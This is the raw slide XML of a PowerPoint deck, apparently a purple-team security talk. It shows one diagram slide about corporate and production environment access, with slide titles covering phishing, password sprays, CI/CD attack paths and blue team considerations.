              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{776532AB-5606-6144-BF10-956DF136B6C6}"/>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945678" y="2335595"/>
            <a:ext cx="1109774" cy="549602"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="80" name="Picture 79">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0E43DD0A-9E1A-C84A-B9C5-4CECD15E2B37}"/>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629437" y="3818483"/>
            <a:ext cx="564735" cy="651617"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="81" name="Picture 80">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A4D7163-46BD-984C-A6CF-6ACCAF3314B8}"/>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0462259" y="3882416"/>
            <a:ext cx="865895" cy="587684"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E51FD79B-7DCD-CE46-AF72-28402AD66B40}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="369526" y="4965221"/>
            <a:ext cx="862287" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>80%</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="57" name="TextBox 56">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{427BD378-0A99-FE42-A0E7-903B0DBCF5B3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2883880" y="5005310"/>
            <a:ext cx="862287" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>15%</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="59" name="TextBox 58">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D56CA01F-438B-8A44-B517-7E1C2EE28ED3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1669571" y="5682978"/>
            <a:ext cx="862287" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>5%</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Cloud 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6D5FD129-8965-0A4A-88BD-22EC168FE24A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8278756" y="1376076"/>
            <a:ext cx="3778704" cy="3962435"/>
          </a:xfrm>
          <a:prstGeom prst="cloud">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loud 60">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BF09ABE9-6118-B24A-9961-55E1B1DC8D1F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="205044" y="1376076"/>
            <a:ext cx="4101358" cy="3921179"/>
          </a:xfrm>
          <a:prstGeom prst="cloud">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="317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B2A661-5728-D54B-8936-6DDBB7BD20B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4526683" y="3995831"/>
            <a:ext cx="3500428" cy="20554"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="539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10782B-3DDD-3B43-B64C-2F64166E85FE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4916798" y="2579137"/>
            <a:ext cx="2614863" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Access restricted by VPN, VPC, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ldap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> groups, etc.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="65" name="TextBox 64">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{021D6E9F-8B90-4B47-AEE3-2D7B0D89499B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4844577" y="5554983"/>
            <a:ext cx="3179917" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Access tokens/keys stored on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t>corp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="00B0F0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> laptops</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5122" name="Picture 2" descr="onelogin logo | NCS Madison">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DB8F2B1D-8E48-C049-914E-9FCC28195CE1}"/>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2094105" y="4134865"/>
            <a:ext cx="1005645" cy="3005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C4E6D5D-2266-3544-94A9-838BBFB31709}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10253153" y="840068"/>
            <a:ext cx="2320511" cy="738664"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Prod Env</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="69" name="TextBox 68">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86204129-531F-3E40-9CCE-0E3AA807F264}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="74079" y="822754"/>
            <a:ext cx="1688479" cy="738664"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Corp Env</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="17" name="Straight Arrow Connector 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{79D1F071-6DEB-AF45-8A89-2BBCDAC87118}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="1341781" y="4555330"/>
            <a:ext cx="496806" cy="97884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6D95441-E650-084C-9BB5-4E9FBB8E25B0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="2024977" y="4555330"/>
            <a:ext cx="15213" cy="112764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1B36A462-CDFF-8A4A-82F4-0A171FA9B845}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="57" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="2281441" y="4518155"/>
            <a:ext cx="602439" cy="67182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1" name="Up Arrow 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D31F09F-9CDF-0745-A64F-5893D2CE0AA7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1923278" y="3552200"/>
            <a:ext cx="332445" cy="45453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214D8AAE-6BE1-1944-8F47-804C8A2F74D6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="863336" y="3456645"/>
            <a:ext cx="288283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D108CCA-ABF1-8740-8B71-6B086F846E00}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="4469600" y="5005310"/>
            <a:ext cx="4476078" cy="628959"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="539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5124" name="Picture 4" descr="GitHub Logos and Usage · GitHub">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{031C410E-B1F7-2D4F-BC8E-AD931B3B56B5}"/>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2466370" y="2377867"/>
            <a:ext cx="472128" cy="47212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itHub Logos and Usage · GitHub">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E96052B-BF6E-8347-B9DA-47F47DC12F7B}"/>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10352040" y="2555346"/>
            <a:ext cx="549603" cy="549603"/>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Straight Arrow Connector 86">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DEF47C65-A859-474C-89AB-E474772FA590}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="2141568" y="2460680"/>
            <a:ext cx="2364290" cy="3181042"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:ln w="539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1828AA9C-FA1B-3C40-A887-DF4D8CDDF71F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8671821" y="5481924"/>
            <a:ext cx="3025803" cy="11402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8" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{917B53C9-252F-1F41-BBD2-D320EB0E552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8766742" y="5518631"/>
            <a:ext cx="515564" cy="711804"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="97" name="Rounded Rectangle 96">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0F8B9853-FC7D-B646-AE89-FBD1C031DD60}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9657256" y="5571547"/>
            <a:ext cx="865173" cy="431985"/>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 Servers</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="98" name="Picture 97">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{90CC7467-72A1-674F-9822-7A5FEE46374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704594" y="5980820"/>
            <a:ext cx="822486" cy="519811"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="99" name="Picture 98">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{40396B1F-89BF-8D40-98FB-D74362E19ED3}"/>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9614265" y="6112023"/>
            <a:ext cx="443002" cy="443002"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="100" name="TextBox 99">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{629461ED-2521-8B42-93B9-01D38C280E2F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10132262" y="5165644"/>
            <a:ext cx="2320511" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Some On Prem</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3975355482"/>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13432</TotalTime>
  <Words>1095</Words>
  <Application>Microsoft Macintosh PowerPoint</Application>
  <PresentationFormat>Widescreen</PresentationFormat>
  <Paragraphs>201</Paragraphs>
  <Slides>30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Threat Focused Purple Team Exercises (non-AD Edition)</vt:lpstr>
      <vt:lpstr>About Me</vt:lpstr>
      <vt:lpstr>Agenda</vt:lpstr>
      <vt:lpstr>Approach</vt:lpstr>
      <vt:lpstr>Approach</vt:lpstr>
      <vt:lpstr>Planning</vt:lpstr>
      <vt:lpstr>Execution</vt:lpstr>
      <vt:lpstr>Outside-In Attack Paths &amp; Considerations</vt:lpstr>
      <vt:lpstr>10,000 Ft view</vt:lpstr>
      <vt:lpstr>Cred Harvest Phishing</vt:lpstr>
      <vt:lpstr>Blue Team Considerations</vt:lpstr>
      <vt:lpstr>Payload-Based Phishing</vt:lpstr>
      <vt:lpstr>Blue Team Considerations</vt:lpstr>
      <vt:lpstr>Blue Team Considerations</vt:lpstr>
      <vt:lpstr>Public Asset Discovery</vt:lpstr>
      <vt:lpstr>Blue Team Considerations</vt:lpstr>
      <vt:lpstr>Password Sprays</vt:lpstr>
      <vt:lpstr>Blue Team Considerations</vt:lpstr>
      <vt:lpstr>Internal Attack Paths &amp; Considerations</vt:lpstr>
      <vt:lpstr>Internal Recon/Discovery</vt:lpstr>
      <vt:lpstr>Common AD Attacks</vt:lpstr>
      <vt:lpstr>Blue Team Considerations</vt:lpstr>
      <vt:lpstr>CI/CD Pipeline</vt:lpstr>
      <vt:lpstr>CI/CD Hosts</vt:lpstr>
      <vt:lpstr>Blue Team Considerations</vt:lpstr>
      <vt:lpstr>Summary</vt:lpstr>
      <vt:lpstr>In A Nutshell</vt:lpstr>
      <vt:lpstr>In A Nutshell</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Techniques and Blue Considerations In Modern Tech Environments</dc:title>
  <dc:creator>Microsoft Office User</dc:creator>
  <cp:lastModifiedBy>Cedric Owens</cp:lastModifiedBy>
  <cp:revision>65</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2020-10-13T02:05:48Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-05-24T20:24:03Z</dcterms:modified>
</cp:coreProperties>
</file>